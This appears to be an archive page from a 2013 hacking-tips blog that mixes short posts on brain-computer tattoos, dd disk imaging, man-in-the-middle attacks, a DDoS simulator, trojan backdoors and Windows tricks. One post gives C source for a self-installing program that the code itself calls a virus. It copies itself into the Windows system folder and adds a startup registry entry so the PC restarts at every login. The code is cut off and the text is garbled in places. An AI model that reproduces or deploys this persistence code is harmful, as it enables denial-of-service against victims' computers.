Skip to main content

Posts

Showing posts from February, 2013

Temporary TattoosCould MakeElectronicTelepathy,TelekinesisPossible

Temporary tattoos could make electronic telepathy and telekinesis possible Charles Q. Choi - Txchnologist Temporary electronic tattoos could soon help people fly drones with only thought and talk seemingly telepathically without speech over smartphones, researchers say. Electrical engineer Todd Coleman at the University of California at San Diego is devising noninvasive means of controlling machines via the mind, techniques virtually everyone might be able to use. Commanding machines using the brain is no longer the stuff of science fiction. In recent years, brain implants have enabled people to control robotics using only their minds, raising the prospect that one day patients could overcome disabilities using bionic limbs or mechanical exoskeletons. But brain implants are invasive technologies, probably of use only to people in medical need of them. Instead, Coleman and his team are developing wireless flexible electronics one ca

How to purpose a girl in physics..

That's how a physician will purpose another physician :-)

How to create ghost image of hard disk for free?

If you are the person who want to backup complete disk along with OS. So lets see how we can create hard disk image or ghost image or disk clone without using those highly priced ghost creating software. Requirements: Ubuntu Live CD/DVD, A hard disk with more capacity than the one you want to clone and some basic knowledge ofLinux. Procedure: Linux provides disk dumping feature, this feature can be used for creating complete backup of any possible storage media. And we will use this feature of Linux command shell to create ghost images. While writing this tutorial I am assuming that you want to backup a hard disk which already havean OS installed in it. Boot from Ubuntu Live CD/DVD. Now mount the hard disk youwant to take backup on /mnt folder. Now take backup using following commands, [root@localhost ~]dd if=/dev/sda1 of=/ mnt/ image.img This will create complete image of hard disk partition sda1, next you must take backup of partition table, [root@localhost ~]#dd if=/dev/sda of=/ mnt

Man in the middle attack

Man-in-the-Middle Attack ————————————— Man-In-The-Middle attack is the type of attack where attackers intrude into an existing connection to intercept the exchanged data and inject false information. It involves eavesdropping on a connection, intruding into a connection, intercepting messages, and selectively modifying data. DEFINITION : —————— The term "Man-in-the-middle attack" (MITM attack) refers to the type of attack where the attacker intrudes into the communication between the endpoints on a network to inject false information and intercept the data transferred between them. MITM attack is also known as: ————————————— Bucket-brigade attack —————————— Fire brigade attack ————————— Monkey-in-the-middle attack ————————————— Session hijacking ———————— TCP hijacking ——————— TCP session hijacking ——————————— Name Origin: —————— The name "Man-in-the-Middle" is derived from the basketball scenario where two players intend to pass a ball to each other while one player

Change ur windows system rating

Thats my system ratings whats ur ??? ;)     This is not real but just a fake way to change System Rating to change your system sub- score.  There are some steps to work with by which you can hack system rating of windows vista, hack system rating of windows 7 & even hack system rating of all windows 8 beta versions.  You can just change the system sub-score to anything you like. And remember that it is just a hack to get a better look not an actual system upgrade…  To hack system rating follow the easy steps :- 1. Open My Computer and navigate to- C:>>Windows>>Performance>>WinS AT>>DataStore & look for the latest XML file “Formal.Assessment (Initial).WinSAT” 2. Copy that xml file to your desktop. 3. Open the copied XML with Word Pad . 4. Look for the lines that says:-)   x.x   x.x   x.x   x.x</ CPUSubAggScore>  x.x</ VideoEncodeScore>  x.x   x.x   x.x   5. Now change the numbers between the < ></ > with anything you like then

Chat in 007 style

Wanted to chat in 007 style ;) 1. All you need is your friend's IP Address and your Command Prompt. 2. Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A 3. Now save this as "Messenger.Bat". 4. now open the file 5. type the IP Address of the computer you want to contact and press enter 6. Now all you need to do is type your message and press Enter. Start Chatting....... !

BoNeSi :: The DDoS Botnet Simulator

BoNeSi :: The DDoS Botnet Simulator ------------------------------------------- BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks. BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly configurable and rates, data volume, source IP addresses, URLs and other parameters can be configured.

Source code to restart windows

Source code to Restart your PC every time… this is a simple program which make a .exe in SYSTEM folder…and create registry to run file when we login… Source:- #include #include #include int found,drive_no; char buff[128]; void findroot() { int done; struct ffblk ffblk; //File block structure done=findfirst(“C:\\windows\ \system”,&ffblk,FA_DIREC); // to determine the root drive if(done==0) { done=findfirst(“C:\\windows\ \system\ \shacker.exe”,&ffblk,0); // to determine whether the virus is already installed or not if(done==0) { found=1; //means that the system is already infected return; } drive_no=1; return; } done=findfirst(“D:\\windows\ \system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“D:\\windows\ \system\ \shacker.exe”,&ffblk,0); if(done==0) { found=1;return; } drive_no=2; return; } done=findfirst(“E:\\windows\ \system”,&ffblk,FA_DIREC); if(done==0) { done=findfirst(“E:\\windows\ \system\ \shacker.exe”,&ffblk,0); if(done==0) { found=1; return; } dri

Change folder background

Change ur Folder Background !!! Step 1:Have the Folder you want to put the background on open !!! 2. Open up Notepad, then simply paste in this code: [{BE098140-A513-11D0-A3A4-00C0 4FD706EC}] iconarea_image=***Picture Location Here! ***\***Name of File!*** 3. Go to ur picture (the picture you want to use!) and right click and select properties and find the file location for example lets say my file is in "my hardrive" it would be located at "C:\\" understand? copy the location! 4. Now go back to ur text document (notepad) and where it says ***Picture Location Here!*** paste the location...u copied in the previus step 5. Now after u've done that where it says ***Name of File!*** type the name of the file including the .jpg .bmp .bip. jpeg etc 6. Save the text document as "desktop.ini" be sure to remember the .ini extension! click Save as "All Files" not "Text Document" and save the document in the folder where u want the background t

Jat1n

Trojan blackdoor

What is trojan backdoor ? Backdoor.Trojan is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer. As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer. A computer with a sophisticated back door program installed may also be referred to as a "zombie" or a "bot". A network of such bots may often be referred to as a "botnet". Botnets have been well publicized in the news over the years, with different instances being given specific names such as Kraken, Mariposa, or Kneber, alon

10 Fast and Free Security Enhancements !!!!

10 Fast and Free Security Enhancements !!!! 1. Check Windows Update and Office Update regularlyc !!! 2. Install a personal firewall. Both SyGate (_www.sygate.com ) and ZoneAlarm (_www.zonelabs.com ) offer free versions. 3. Install a free spyware blocker. ("Spyware," ) was SpyBot Search & Destroy (_ http://security.kolla.de/ ). SpyBot is also paranoid and ruthless in hunting out tracking cookies. 4. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts. 5. Use a good antivirus that can protect u AVG is one of the best free security provider for home users 6. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WPA with the biggest key you can get. 7. When using any software just make sure its download